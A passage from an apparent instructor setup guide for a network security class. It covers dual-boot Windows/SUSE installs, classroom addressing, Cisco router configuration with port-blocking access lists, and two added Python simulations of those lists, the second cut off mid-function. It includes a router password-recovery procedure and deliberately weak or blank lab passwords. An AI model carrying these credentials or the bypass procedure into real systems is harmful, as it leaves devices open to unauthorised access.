           fragment.cap                        SCNS Book CD
           ping.text                           SCNS Book CD
           ping.cap                            SCNS Book CD
           ftp.txt                             SCNS Book CD
           ftp.cap                             SCNS Book CD
Lesson 3   puTTY.exe                           SCNS Book CD
           ping_arp.mac.cap                    SCNS Book CD
           rip.update.cap                      SCNS Book CD
           ripv2withAuthentication.cap         SCNS Book CD
Lesson 5   ISA Server 2006                     www.microsoft.com/isaserver/prodinfo/default.mspx
           ISAScwHlpPack.exe                   SCNS Book CD
Lesson 6   rfc-index.wri                       SCNS Book CD
           rfc2547.txt                         SCNS Book CD
           rfc2979.txt                         SCNS Book CD
Lesson 8   Snort_2_6_1_2_Installer             SCNS Book CD
           Snort Rules                         SCNS Book CD
           mysql-essential-5.0.27-win32        SCNS Book CD
           adodb493a.tgz                       SCNS Book CD
           base-1.2.7.tar.gz                   SCNS Book CD
Lesson 9   WildPackets_OmniPeek_Personal41     www.omnipeek.com/downloads.php
           dotnetfx.exe                        SCNS Book CD
           NetStumbler                         SCNS Book CD
In this course, there are several wireless components utilized. Each training
location can decide if they wish to acquire this equipment or use the content
as the learning source. The equipment used in this lesson is:
Two laptops running Windows XP.
One Linksys WPC54G NIC and associated set-up CD-ROM.
One Netgear WPN511 NIC and associated set-up CD-ROM.
One Linksys WAP54G access point and associated set-up CD-ROM.
One Netgear WPN824 access point and associated set-up CD-ROM.
Class Requirements
In order for the class to run properly, perform the procedures described below.
Before you begin actually setting up the class, here are some recommendations
for the classroom conguration and hardware preparation.
Recommendations for hardware preparation:
The hardware requirements are listed earlier in this course. It is not advisable
to use systems that do not meet these requirements.
It is recommended that all the computers be of the same or similar hardware
configuration.
Configure the BIOS so that the boot order is 1: DVD-ROM, 2: floppy drive
(if present), and 3: hard drive. Protect the student machines with a BIOS
password.
Classroom Configuration
The following graphic shows the recommended classroom configuration. Use this
figure in conjunction with the IP addressing and naming schemes described in the
following section.
Figure 0-1: Recommended classroom setup.
IP Addressing and Computer Naming Scheme
Refer to the classroom configuration for the recommended IP addressing and
computer naming schemes for this course. Use this pattern to develop the names
and addresses for all machines, as required.
The routers divide the classroom into two halves, LEFT and RIGHT, with the
CENTER router controlled by the instructor. The LEFT side is configured for
subnet 172.16.0.0/16, the CENTER is configured for subnet 172.17.0.0/16, and the
RIGHT side is configured for subnet 172.18.0.0/16. Students should have the
passwords for the LEFT and RIGHT routers, as per their location in the
classroom, but do not need the password for the CENTER router.
This course uses two base operating systems, Windows Server 2003 and SUSE
Linux Enterprise Server 10. Each machine will dual-boot to these two systems,
using the name and IP addresses as per the following table.
Part of Classroom   Windows Name   Linux Name   IP Address     Default Gateway
LEFT                WIN-L01        LIN-L01      172.16.10.1    172.16.0.1
LEFT                WIN-L02        LIN-L02      172.16.10.2    172.16.0.1
LEFT                WIN-L03        LIN-L03      172.16.10.3    172.16.0.1
RIGHT               WIN-R01        LIN-R01      172.18.10.1    172.18.0.1
RIGHT               WIN-R02        LIN-R02      172.18.10.2    172.18.0.1
RIGHT               WIN-R03        LIN-R03      172.18.10.3    172.18.0.1
CENTER              WIN-C01        LIN-C01      172.17.10.1    172.17.0.1
Installing Windows 2003 R2
1. Turn on the computer and insert the Windows Server 2003 R2 disc 1
into the CD-ROM drive.
2. When the screen prompts to BOOT FROM CD press any key to continue
booting. (Note, your system might boot automatically.)
3. At the Windows 2003 Setup Screen, certain files will begin to load
independently.
4. At the Windows 2003 Standard Edition Setup screen, press Enter to set up
Windows Server 2003.
5. Read the Licensing Agreement, and then press F8 to accept the
agreement.
6. The Windows 2003 Standard Edition Setup screen will reappear; press C to
create a partition.
7. In the Create Partition Of Size (In MB) text box type 25000 and press
Enter.
8. To set up Windows on the newly-created partition, select the new partition,
and press Enter.
9. Select Format The Partition Using The NTFS File System (default) and
press Enter. After the partition has been formatted and files copied, the
computer will reboot.
10. Windows Server 2003 will continue installation independently. You will be
able to see the approximate time it will take to complete installation on the
left side of your screen.
11. Windows Server 2003 will install devices independently. The screen may
flash, or flicker, for several seconds during this process.
12. For Regional And Language Options, select your settings, and then click
Next.
13. In the Personalize Your Settings screen, in the Name text box, type TEST,
in the Organization text box, type SCP and click Next.
14. When prompted, enter the product key and click Next.
15. In the Licensing Modes screen, select the Per Device Or Per User radio
button, and then click Next.
16. In the Computer Name dialog box, type WIN-XXX (replace XXX with your
seat number, or as your instructor defines). The Administrator Password
should be left blank, then click Next.
17. If the password is left blank, a screen will appear to confirm that you wish
to leave the password blank; click Yes. (Note, the password is left blank for
running the class; you would always have a password in a production
environment.)
18. In the Date And Time Settings screen, select your time zone, set the date
and time, and click Next.
19. Windows 2003 will begin installing network configurations.
20. In the Windows Server 2003 Setup Network Settings screen, select Typical
Settings. Click Next.
21. In the Windows Server 2003 Setup Workgroup or Computer Domain screen,
select Workgroup and then click Next.
22. Windows Server 2003 will finalize installation and reboot the computer
independently.
23. After the system reboots, press Ctrl+Alt+Delete.
24. In the Log On To Windows screen, type Administrator and leave the pass-
word blank. Click OK.
25. The Personalized Setting will nalize independently.
26. When prompted, insert the Windows Server 2003 disc 2 into the
CD-ROM drive and click OK.
27. In the Windows Server 2003 R2 Setup Wizard screen, click Next when
prompted. (Note, do not check the box to create a desktop shortcut.)
28. In the Setup Summary screen, click Next to copy the files.
29. Windows Server 2003 will update your system independently.
30. In the Completing Windows Server 2003 R2 Setup screen, click Finish.
31. In the Windows Server Post-Setup Security Updates screen, click Finish.
32. When the Windows Server 2003 Post-Setup Security Updates screen appears,
click Yes to close this dialog box.
33. Ensure that the Don't Display This Page At Logon check box is not
checked.
34. Close the Manage Your Server window.
35. Choose Start→Control Panel→Network Connections→Local Area
Connection.
36. Select TCP/IP and click Properties.
37. Select the Use The Following IP Address radio button.
38. In the IP Address text box, type 172.X.X.X (your instructor will inform you
what to enter in the last three octets based on your seat number). On the left
side, your IP will be 172.16.x.x and on the right side, your IP will be
172.18.x.x.
39. In the Subnet Mask text box, type 255.255.0.0.
40. In the Default Gateway text box, type 172.16.0.1 if you are on the left side
and type 172.18.0.1 if you are on the right side (if you are unsure, ask
your instructor which side you are on).
41. In the Preferred DNS Server text box, type 127.0.0.1 and click OK twice.
42. If you receive the Pop-Up Warning, click Yes.
43. Close the Local Area Connection Properties screen.
Installing Network Monitor
1. Choose Start→Control Panel→Add Or Remove Programs.
2. Click the Add/Remove Windows Components button.
3. In the Windows Components Wizard window, scroll down the list and
highlight the Management And Monitoring Tools option.
4. Click the Details button.
5. Check the Network Monitor Tools check box and click OK.
6. In the Windows Components Wizard window, click Next.
7. If prompted to insert the CD, do so now and click OK. If you are not
prompted for the CD, move on to the next step.
8. Click Finish once the install has completed.
9. Close the Add Or Remove Programs window.
10. Remove the Windows 2003 Server disc from your CD-ROM drive.
Installing Additional Tools for Windows 2003 Server
1. Insert the SCP Tools & Resources disc that was provided with your
book into your CD-ROM drive.
2. Open the CD to show its contents.
3. Create a folder on the Windows partition C:\Tools.
4. Copy the files on the CD to C:\Tools.
Installing SUSE Linux Enterprise Server 10
1. The installation of SUSE LINUX ENTERPRISE 10 must be done after the
installation of Windows Server 2003.
2. Insert the SUSE Linux Enterprise Server (SLES) 10 disc into the DVD-
ROM drive.
3. Restart the computer with the SLES disc in the drive. This will begin the
installation.
4. At the initial SLES install screen, select the Installation option, and press
Enter. This step may take a few minutes while files are copied.
5. Select your language option and click Next. These steps are based on
English (US).
6. Read the License Agreement, select the Yes, I Agree To The License
Agreement radio button, and click Next.
7. Leave the radio button selected for New Installation and click Next.
8. Select your Region and Time Zone, and click Next.
9. Accept the default installation settings, and click Accept.
10. Read the prompt about formatting your partitions, then click Install.
11. While the files are loading, you can watch the progress bar on the right side
of the screen. This will note the approximate time remaining to finish the
installation. (Note: Based on your system, this may take many minutes.)
12. When the files have finished loading, your system may reboot. Remove the
disc from the DVD-ROM drive. If you do not remove the disc, the system
will re-enter install mode.
13. At the boot loader, select the SUSE Linux Enterprise Server 10 line, and
press Enter. The install process will continue.
14. Enter LIN-XXX as your Hostname. Replace XXX with your seat number
in the class. For example, LIN-L01 or LIN-R03.
15. Enter SCPXXX as your Domain Name. Replace XXX to match your seat
number in the class as in the previous step. For example, SCPL01 or
SCPR03.
16. Once the Hostname and Domain name are entered, click Next.
17. Enter QWERTY1 as the password, and confirm the password in the second
text box. Click Next.
18. The Network Configuration screen will take a moment as Linux determines
your system conguration. Once complete, click Network Interfaces to edit
the settings on your NIC.
19. To manually configure your NIC, click the Edit button.
20. With the Address tab active, select the Static Address Setup radio button.
21. In the IP Address text box, type 172.x.x.x (your instructor will inform you
what to enter in the last three octets, it is based on your seat in the
classroom. If you are on the left side, this will be 172.16.x.x, and if you are
on the right side, this will be 172.18.x.x.)
22. Change the subnet mask to 255.255.0.0, and then click the Routing
button.
23. In the Default Gateway text box, type 172.16.0.1 if you are on the left side
of the network, and type 172.18.0.1 if you are on the right side of the
network. If you are unsure, please ask your instructor prior to entering any
DG addresses.
24. Once the Default Gateway address is entered, click OK, and then click
Next.
25. At the Network Card Configuration Overview, verify your IP Address and
Subnet Mask, and then click Next.
26. At the Network Configuration screen, click Next. Networking services will
now be installed and configured.
27. Select the No, Skip This Test radio button, and click Next.
28. Accept the default CA Management Installation Settings, and click Next.
29. Accept the default Authentication Method Of Local (/etc/passwd), and
click Next.
30. In the New Local User screen, enter the following information:
User's Full Name: SCP Test User
Username: test1
Password: 1test
Confirm Password: 1test
Click Next.
31. The system will now perform clean up of the installation. Read through the
Release Notes, and then click Next.
32. Accept the default Hardware Configuration as it is detected, and click
Next. If your system does not properly detect your hardware, you will need
to locate the correct Linux drivers for your hardware. This setup guide does
not include non-detected hardware environments.
33. The final setup files will be configured. Once done, you will see the
Installation Completed screen. Click Finish to exit the Setup and log in to Linux.
34. After the files load, you will be at the login prompt. Enter root as the
Username, and press Enter.
35. Enter QWERTY1 as the password, and press Enter. The default files will
load, and you will now be logged into SUSE Linux Enterprise 10.
Installing Additional Tools for SUSE Linux Enterprise Server 10
1. Insert the SCP Tools & Resources disc that was provided with your
book into your CD-ROM drive.
2. Open the CD to show its contents.
3. Use the Nautilus File Manager and navigate to the / directory.
4. Create a folder labeled Tools.
5. Copy the files from the CD to the /Tools folder.
Configuring Cisco Routers
Three Cisco routers are used in the classroom. The course is written based on the
Cisco 2500 series, specifically the 2501, running IOS version 12.2 (with IPSec
and SSH support). These routers can be easily found through many authorized
resellers, and while they are not the most current Cisco routers, they work very
well for the purposes of this class. There is no need to purchase or use newer
routers for the classroom, but you are welcome to do so, if you so desire.
During the configuration of the CENTER router, you must enter the IP Address
of the gateway for the classroom. This is to allow Internet Access for the
classroom, and you must configure the CENTER router as per your environment, if
Internet Access is to be granted. Extensive routing configurations beyond what is
listed here are not required for the class.
The LEFT router is for one half of the class to connect through. It should
have the following configuration:
Hostname and Routername: LEFT
Access List Configuration:
Access-list 123 deny tcp any any eq 25
Access-list 123 permit ip any any
INT S0: ip access-group 123 in
The CENTER router is for the Instructor to connect to the class. It should
have the following configuration:
Hostname and Routername: CENTER
Access List Configuration:
Access-list 155 deny tcp any any eq 20
Access-list 155 deny tcp any any eq 21
Access-list 155 permit ip any any
INT S0: ip access-group 155 in
INT S1: ip access-group 155 in
The RIGHT router is for the other half of the class to connect through. It
should have the following configuration:
Hostname and Routername: RIGHT
Access List Configuration:
Access-list 145 deny tcp any any eq 25
Access-list 145 permit ip any any
INT S1: ip access-group 145 in
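The three access lists above (and the step-by-step entry of them in the Configuring the Access Lists section) rely on two IOS behaviours that are easy to get wrong: entries are tested top to bottom and the first match wins, and a list that matches nothing falls through to an implicit "deny ip any any". The following Python model is an added example, not code from the course or its CD; the packet addresses in it are constructed sample values, and it only models protocol and destination port because all three lists use "any any" for source and destination.

```python
"""Added example (not part of the course text): a small model of the
classroom access lists 123, 155 and 145, showing the first-match rule
and the implicit deny that ends every Cisco IOS access list."""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class Packet:
    proto: str                  # "tcp", "udp" or "icmp"
    src: str                    # constructed sample addresses, not from the course
    dst: str
    dport: Optional[int] = None


@dataclass(frozen=True)
class AclEntry:
    action: str                 # "permit" or "deny"
    proto: str                  # "ip" matches every protocol, as in "permit ip any any"
    dport: Optional[int] = None  # None means the entry has no "eq <port>" clause


def evaluate(acl: List[AclEntry], pkt: Packet) -> Tuple[str, Optional[int]]:
    """Walk the list top to bottom and stop at the first matching entry.

    Returns (decision, index of the matching entry). A packet that matches
    no entry falls through to the implicit "deny ip any any", reported as
    index None so the caller can tell it apart from an explicit deny.
    """
    for i, entry in enumerate(acl):
        if entry.proto != "ip" and entry.proto != pkt.proto:
            continue
        if entry.dport is not None and entry.dport != pkt.dport:
            continue
        return entry.action, i
    return "deny", None


# The three lists as given in the router summaries.
ACL_123_LEFT = [AclEntry("deny", "tcp", 25), AclEntry("permit", "ip")]
ACL_155_CENTER = [AclEntry("deny", "tcp", 20), AclEntry("deny", "tcp", 21),
                  AclEntry("permit", "ip")]
ACL_145_RIGHT = [AclEntry("deny", "tcp", 25), AclEntry("permit", "ip")]

# Where each list is bound with "ip access-group <n> in". A list that is
# defined but never bound to an interface filters nothing.
INBOUND_BINDINGS: Dict[Tuple[str, str], List[AclEntry]] = {
    ("LEFT", "S0"): ACL_123_LEFT,
    ("CENTER", "S0"): ACL_155_CENTER,
    ("CENTER", "S1"): ACL_155_CENTER,
    ("RIGHT", "S1"): ACL_145_RIGHT,
}


def inbound_decision(router: str, interface: str, pkt: Packet) -> str:
    """Decision for a packet arriving on the given interface of the given router."""
    acl = INBOUND_BINDINGS.get((router, interface))
    if acl is None:
        return "permit"         # no inbound ACL on this interface: everything passes
    return evaluate(acl, pkt)[0]


def demo() -> Dict[str, str]:
    """Constructed sample traffic run through the bindings above."""
    smtp = Packet("tcp", "172.18.10.1", "172.16.10.1", 25)
    ftp_ctl = Packet("tcp", "172.16.10.1", "172.18.10.1", 21)
    dns = Packet("udp", "172.16.10.1", "172.18.10.1", 53)
    return {
        "smtp into LEFT S0": inbound_decision("LEFT", "S0", smtp),
        "smtp into LEFT E0 (no ACL bound)": inbound_decision("LEFT", "E0", smtp),
        "ftp control into CENTER S1": inbound_decision("CENTER", "S1", ftp_ctl),
        "dns into CENTER S1": inbound_decision("CENTER", "S1", dns),
    }


if __name__ == "__main__":
    for label, decision in demo().items():
        print(f"{label}: {decision}")
```

Two checks worth running against your own lists before binding them: evaluate a packet against the list with the final "permit ip any any" removed (everything is then dropped, which is what happens in the lab if that line is forgotten), and against the same entries in reverse order (the deny is then never reached, because the permit matches first).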
The detailed configuration procedures are listed here in three main categories:
Physical configuration
Router setup
Access list configuration
Physical Router Configuration
The LEFT router is to be connected to the CENTER router via a Cisco serial
cable. The RIGHT router is also to be connected to the CENTER router via a
Cisco serial cable. All Ethernet connections are to be made through standard
10/100 BaseT cables.
1. Study the class setup diagram provided in Classroom Conguration.
2. Physically connect the three routers to each other, using serial crossover
cables, so that the router designated as CENTER controls the clock rate.
To do this, connect the DCE end of the serial cable to the serial interfaces
on the CENTER router and the DTE ends to the LEFT's and RIGHT's
appropriate serial interfaces.
3. Connect the Ethernet interface on the CENTER router to the instructor
machine via a crossover Ethernet cable.
4. Connect the Ethernet interfaces on the LEFT and RIGHT routers to
their respective hubs serving their side of the classroom.
Before You Start the Router Setup
All routers should be cleared of any configs before setting up the class. If you
have a configured router but you don't know the password, perform the following
steps:
1. Console into the router.
2. Enter the sh ver command, and record the configuration register setting
(usually 0x2102).
3. Power down the router, and then power it back up.
4. After the amount of main memory is displayed, press the Break key (or
Ctrl+Break). You should see the > prompt with no router name.
5. Enter o/r 0x42 to boot from flash or o/r 0x41 to boot from the CD-ROM.
Typically, you would boot from flash if it were intact.
6. Enter i to force the router to reboot and ignore its saved config.
7. Answer no to all setup questions.
8. When the Router> prompt is displayed, enter enable to switch to enable
mode. The Router# prompt should now be displayed. Once you are in enable
mode, you can view and change the password, and you can erase the config.
9. To view the password, enter show config at the Router# prompt.
10. To change the password, from the Router# prompt:
a. Enter config mem to copy NVRAM to mem.
b. Enter wr term
c. Enter config term to enter config mode. The Router(config)# prompt is
now displayed.
d. If an enable secret password is set, enter enable secret newpassword or
if there is no enable secret password, enter enable password
newpassword where newpassword is the new password you want to use.
e. To exit config mode press Ctrl+Z. The Router# prompt is now
displayed.
f. Enter write mem to commit the changes to mem. You should now be
able to console in and configure the router.
11. To erase the config, from the Router# prompt:
a. Enter write erase
b. Enter config term to enter config mode. The Router(config)# prompt is
now displayed.
c. Enter config-register 0x2102 or whatever the configuration register
setting was when you began.
d. To exit config mode, press Ctrl+Z. The Router# prompt is now
displayed.
e. Enter reload
f. When you are prompted to save the modified system configuration,
enter y
g. When you are prompted to proceed with the reload, enter y
Setup for CENTER Router
The CENTER router is used by the instructor to connect to the rest of the class.
To set up the CENTER router:
1. Boot up the router and console into it. You should be prompted to enter
the initial configuration dialog. (If you are not, follow the procedures listed
previously in the Before You Start the Router Setup section.)
2. When you are prompted:
a. To enter the initial conguration dialog, enter y
b. To enter basic management setup, enter n
c. As to whether you want to see the current interface summary, press
Enter.
d. To enter the host name for [Router], enter CENTER
e. To enter the enable secret password, enter instructor
f. To enter the enable password, enter cisco1
g. To enter the virtual terminal password, enter 2501
h. To configure SNMP network management, enter n
i. To configure LAT, enter n
j. To configure bridging, press Enter to accept the default of No.
k. To configure AppleTalk, press Enter to accept the default of No.
l. To configure DECnet, press Enter to accept the default of No.
m. To configure IP, press Enter to accept the default of Yes.
n. To configure IGRP routing, enter n
o. To configure RIP routing, enter y
p. To configure CLNS, press Enter to accept the default of No.
q. To configure IPX, press Enter to accept the default of No.
r. To configure Vines, press Enter to accept the default of No.
s. To configure XNS, press Enter to accept the default of No.
t. To configure Apollo, press Enter to accept the default of No.
u. If you are prompted to configure BRI, select switch type 0.
v. To configure the Ethernet0 interface, press Enter to accept the default
of Yes.
w. To configure IP on this interface, press Enter to accept the default of
Yes.
x. For the IP address for this interface, enter 172.17.0.1
y. For the subnet mask for this interface, press Enter to accept the default
of 255.255.0.0.
z. To configure the Serial0 interface, press Enter to accept the default of
Yes.
aa. To configure IP on this interface, press Enter to accept the default of
Yes.
ab. To configure IP unnumbered on this interface, press Enter to accept the
default of No.
ac. For the IP address for this interface, enter 192.168.20.2
ad. For the subnet mask for this interface, press Enter to accept the default
of 255.255.255.0.
ae. To configure the Serial1 interface, press Enter to accept the default of
Yes.
af. To configure IP on this interface, press Enter to accept the default of
Yes.
ag. To configure IP unnumbered on this interface, press Enter to accept the
default of No.
ah. For the IP address for this interface, enter 192.168.10.2
ai. For the subnet mask for this interface, press Enter to accept the default
of 255.255.255.0.
aj. If you are prompted to configure any other serial interfaces, enter n
until a configuration command script is generated, and you are
prompted to make a selection regarding the next action.
ak. To enter your selection, press Enter to accept the default of 2. You
should see a message indicating that the router is building the
configuration. When the configuration build is complete, an OK
message is displayed.
al. To press RETURN to get started, press Enter. The CENTER> prompt
should now be displayed.
3. At the CENTER> prompt, enter en to activate enable mode.
4. When you are prompted for the password, enter instructor and the
CENTER# prompt should now be displayed.
5. At the CENTER# prompt, enter conf t to enter config mode. The
CENTER(config)# prompt should now be displayed.
6. At the CENTER(config)# prompt:
a. Enter no ip domain lookup
b. Enter int s0 and the CENTER(config-if)# prompt should now be
displayed.
7. At the CENTER(config-if)# prompt:
a. Enter no shut
b. Enter clo ra 4000000
c. Enter ban 10000000
d. Enter int s1
e. Enter no shut
f. Enter clo ra 4000000
g. Enter ban 10000000
h. Enter exit and the CENTER(config)# prompt is now displayed.
8. At the CENTER(config)# prompt:
a. Enter ip route 0.0.0.0 0.0.0.0 a.b.c.d (note you must replace a.b.c.d
with the gateway to get out of the network to the Internet).
b. Enter exit and the CENTER# prompt is now displayed.
9. At the CENTER# prompt:
a. Enter sh run and you should see a message indicating that the router is
building the configuration.
b. Enter copy ru st
10. When you are prompted for a destination filename, press Enter to accept
the default of startup-config. You should again see a message indicating that
the router is building the configuration.
Setup for LEFT Router
The LEFT router is used by half of the students to connect to the rest of the
class. To set up the LEFT router:
1. Boot up the router and console into it. You should be prompted to enter
the initial configuration dialog. (If you are not, follow the procedures listed
previously in the Before You Start the Router Setup section.)
2. When you are prompted:
a. To enter the initial configuration dialog, enter y
b. To enter basic management setup, enter n
c. As to whether you want to see the current interface summary, press
Enter.
d. To enter the host name for [Router], enter LEFT
e. To enter the enable secret password, enter cisco
f. To enter the enable password, enter cisco1
g. To enter the virtual terminal password, enter 2501
h. To configure SNMP network management, enter n
i. To configure LAT, enter n
j. To configure bridging, press Enter to accept the default of No.
k. To configure AppleTalk, press Enter to accept the default of No.
l. To configure DECnet, press Enter to accept the default of No.
m. To configure IP, press Enter to accept the default of Yes.
n. To configure IGRP routing, enter n
o. To configure RIP routing, enter y
p. To configure CLNS, press Enter to accept the default of No.
q. To configure IPX, press Enter to accept the default of No.
r. To configure Vines, press Enter to accept the default of No.
s. To configure XNS, press Enter to accept the default of No.
t. To configure Apollo, press Enter to accept the default of No.
u. If you are prompted to configure BRI, select switch type 0.
v. To configure the Ethernet0 interface, press Enter to accept the default
of Yes.
w. To configure IP on this interface, press Enter to accept the default of
Yes.
x. For the IP address for this interface, enter 172.16.0.1
y. For the subnet mask for this interface, press Enter to accept the default
of 255.255.0.0.
z. To configure the Serial0 interface, press Enter to accept the default of
Yes.
aa. To configure IP on this interface, press Enter to accept the default of
Yes.
ab. To configure IP unnumbered on this interface, press Enter to accept the
default of No.
ac. For the IP address for this interface, enter 192.168.10.1
ad. For the subnet mask for this interface, press Enter to accept the default
of 255.255.255.0.
ae. To configure the Serial1 interface, enter n
af. If you are prompted to configure any other serial interfaces, enter n
until a configuration command script is generated, and you are
prompted to make a selection regarding the next action.
ag. To enter your selection, press Enter to accept the default of 2. You
should see a message indicating that the router is building the
configuration. When the configuration build is complete, an OK
message is displayed.
ah. To press RETURN to get started, press Enter. The LEFT> prompt
should now be displayed.
3. At the LEFT> prompt, enter en to activate enable mode.
4. When you are prompted for the password, enter cisco and the LEFT#
prompt should now be displayed.
5. At the LEFT# prompt, enter conf t to enter config mode. The
LEFT(config)# prompt should now be displayed.
6. At the LEFT(config)# prompt:
a. Enter no ip domain lookup
b. Enter int s0 and the LEFT(config-if)# prompt should now be displayed.
7. At the LEFT(config-if)# prompt:
a. Enter no shut
b. Enter ban 10000000
c. Enter exit and the LEFT(config)# prompt is now displayed.
8. At the LEFT(config)# prompt:
a. Enter ip route 0.0.0.0 0.0.0.0 192.168.10.2
b. Enter exit and the LEFT# prompt is now displayed.
9. At the LEFT# prompt:
a. Enter sh run and you should see a message indicating that the router is
building the configuration.
b. Enter copy ru st
10. When you are prompted for a destination filename, press Enter to accept
the default of startup-config. You should again see a message indicating that
the router is building the configuration.
Setup for RIGHT Router
The RIGHT router is used by half of the students to connect to the rest of the
class. To set up the RIGHT router:
1. Boot up the router and console into it. You should be prompted to enter
the initial configuration dialog. (If you are not, follow the procedures listed
previously in the Before You Start the Router Setup section.)
2. When you are prompted:
a. To enter the initial configuration dialog, enter y
b. To enter basic management setup, enter n
c. As to whether you want to see the current interface summary, press
Enter.
d. To enter the host name for [Router], enter RIGHT
e. To enter the enable secret password, enter cisco
f. To enter the enable password, enter cisco1
g. To enter the virtual terminal password, enter 2501
h. To configure SNMP network management, enter n
i. To configure LAT, enter n
j. To configure bridging, press Enter to accept the default of No.
k. To configure AppleTalk, press Enter to accept the default of No.
l. To configure DECnet, press Enter to accept the default of No.
m. To configure IP, press Enter to accept the default of Yes.
n. To configure IGRP routing, enter n
o. To configure RIP routing, enter y
p. To configure CLNS, press Enter to accept the default of No.
q. To configure IPX, press Enter to accept the default of No.
r. To configure Vines, press Enter to accept the default of No.
s. To configure XNS, press Enter to accept the default of No.
t. To configure Apollo, press Enter to accept the default of No.
u. If you are prompted to configure BRI, select switch type 0.
v. To configure the Ethernet0 interface, press Enter to accept the default
of Yes.
w. To configure IP on this interface, press Enter to accept the default of
Yes.
x. For the IP address for this interface, enter 172.18.0.1
y. For the subnet mask for this interface, press Enter to accept the default
of 255.255.0.0.
z. To configure the Serial0 interface, enter n
aa. To configure the Serial1 interface, press Enter to accept the default of
Yes.
ab. To configure IP on this interface, press Enter to accept the default of
Yes.
ac. To configure IP unnumbered on this interface, press Enter to accept the
default of No.
ad. For the IP address for this interface, enter 192.168.20.1
ae. For the subnet mask for this interface, press Enter to accept the default
of 255.255.255.0.
af. If you are prompted to configure any other serial interfaces, enter n
until a configuration command script is generated, and you are
prompted to make a selection regarding the next action.
ag. To enter your selection, press Enter to accept the default of 2. You
should see a message indicating that the router is building the
configuration. When the configuration build is complete, an OK
message is displayed.
ah. To press RETURN to get started, press Enter. The RIGHT> prompt
should now be displayed.
3. At the RIGHT> prompt, enter en to activate enable mode.
4. When you are prompted for the password, enter cisco and the RIGHT#
prompt should now be displayed.
5. At the RIGHT# prompt, enter conf t to enter config mode. The
RIGHT(config)# prompt should now be displayed.
6. At the RIGHT(config)# prompt:
a. Enter no ip domain lookup
b. Enter int s1 and the RIGHT(config-if)# prompt should now be
displayed.
7. At the RIGHT(config-if)# prompt:
a. Enter no shut
b. Enter ban 10000000
c. Enter exit and the RIGHT(config)# prompt is now displayed.
8. At the RIGHT(config)# prompt:
a. Enter ip route 0.0.0.0 0.0.0.0 192.168.20.2
b. Enter exit and the RIGHT# prompt is now displayed.
9. At the RIGHT# prompt:
a. Enter sh run and you should see a message indicating that the router is
building the configuration.
b. Enter copy ru st
10. When you are prompted for a destination filename, press Enter to accept
the default of startup-config. You should again see a message indicating that
the router is building the configuration.
Configuring the Access Lists
After the initial router setup and the basic configuration have been completed on all three routers, you need to enter the access lists for each of the routers. To do so:
1. To complete the LEFT Router Access Lists:
a. At the LEFT# prompt, enter conf t to switch to config mode. The LEFT(config)# prompt is now displayed.
b. At the LEFT(config)# prompt, enter access-list 123 deny tcp any any eq 25
c. At the LEFT(config)# prompt, enter access-list 123 permit ip any any
d. At the LEFT(config)# prompt, enter int S0 to configure the interface. The LEFT(config-if)# prompt is now displayed.
e. At the LEFT(config-if)# prompt, enter ip access-group 123 in
f. At the LEFT(config-if)# prompt, press Ctrl+Z to leave config mode. The LEFT# prompt is now displayed.
g. At the LEFT# prompt, enter copy ru st and save the configuration changes to startup-config.
2. To complete the RIGHT Router Access Lists:
a. At the RIGHT# prompt, enter conf t to switch to config mode. The RIGHT(config)# prompt is now displayed.
b. At the RIGHT(config)# prompt, enter access-list 145 deny tcp any any eq 25
c. At the RIGHT(config)# prompt, enter access-list 145 permit ip any any
d. At the RIGHT(config)# prompt, enter int S1 to configure the interface. The RIGHT(config-if)# prompt is now displayed.
e. At the RIGHT(config-if)# prompt, enter ip access-group 145 in
f. At the RIGHT(config-if)# prompt, press Ctrl+Z to leave config mode. The RIGHT# prompt is now displayed.
g. At the RIGHT# prompt, enter copy ru st and save the configuration changes to startup-config.
3. To complete the CENTER Router Access Lists:
a. At the CENTER# prompt, enter conf t to switch to config mode. The CENTER(config)# prompt is now displayed.
b. At the CENTER(config)# prompt, enter access-list 155 deny tcp any any eq 20
c. At the CENTER(config)# prompt, enter access-list 155 deny tcp any any eq 21
d. At the CENTER(config)# prompt, enter access-list 155 permit ip any any
e. At the CENTER(config)# prompt, enter int S1 to configure the S1 interface. The CENTER(config-if)# prompt is now displayed.
f. At the CENTER(config-if)# prompt, enter ip access-group 155 in
g. At the CENTER(config-if)# prompt, enter int S0 to configure the S0 interface.
h. At the CENTER(config-if)# prompt, enter ip access-group 155 in
i. At the CENTER(config-if)# prompt, press Ctrl+Z to leave config mode. The CENTER# prompt is now displayed.
j. At the CENTER# prompt, enter copy ru st and save the configuration changes to startup-config.
4. Test the classroom setup, and troubleshoot as necessary. Once physical connectivity issues have been sorted out, you should be able to ping from one side of the classroom to the other. Specifically, the instructor machine should be able to ping every student machine and vice versa. Student machines from the left side of the classroom should be able to ping student machines on the right side of the classroom and vice versa.
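To see how the routers actually apply the lists just entered, here is an added Python simulation (example code written for this page, not Cisco software): it parses the seven access-list lines above, binds them inbound to the interfaces exactly as the procedure does, and evaluates constructed sample packets, including what happens when the permit ip any any line is left off. It models only the syntax the procedure uses (any any source/destination, optional eq <port>); wildcard masks, port ranges and established are out of scope, and the sample addresses are placeholders.

```python
"""Simulate how the numbered extended access lists entered in the procedure
are evaluated by a router: top-down, first match wins, implicit deny last.

Added example for this page, not Cisco IOS code. Only the subset of ACL
syntax the procedure uses is parsed; sample packet addresses are constructed.
"""
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Packet:
    proto: str                    # "tcp", "udp" or "icmp"
    src: str
    dst: str
    dport: Optional[int] = None   # destination port, None for icmp


@dataclass(frozen=True)
class Entry:
    action: str                   # "permit" or "deny"
    proto: str                    # "ip" matches every protocol
    dport: Optional[int]          # None means any destination port


def parse_access_lists(lines):
    """Turn 'access-list N deny tcp any any eq 25' lines into {N: [Entry, ...]},
    keeping the order in which they were entered, because that order is
    exactly what the router evaluates."""
    acls = {}
    for line in lines:
        t = line.split()
        if len(t) < 6 or t[0] != "access-list" or t[2] not in ("permit", "deny"):
            raise ValueError(f"unsupported access-list syntax: {line!r}")
        if t[4] != "any" or t[5] != "any":
            raise ValueError(f"only 'any any' source/destination is modelled: {line!r}")
        dport = None
        if len(t) > 6:
            if t[6] != "eq" or len(t) != 8:
                raise ValueError(f"only 'eq <port>' is modelled: {line!r}")
            dport = int(t[7])
        acls.setdefault(int(t[1]), []).append(Entry(t[2], t[3], dport))
    return acls


def evaluate(entries, pkt):
    """Return the action of the first matching entry. A list with no matching
    entry denies the packet: that is the implicit deny every IOS access list
    ends with, and the reason the 'permit ip any any' line matters."""
    for e in entries:
        proto_match = e.proto == "ip" or e.proto == pkt.proto
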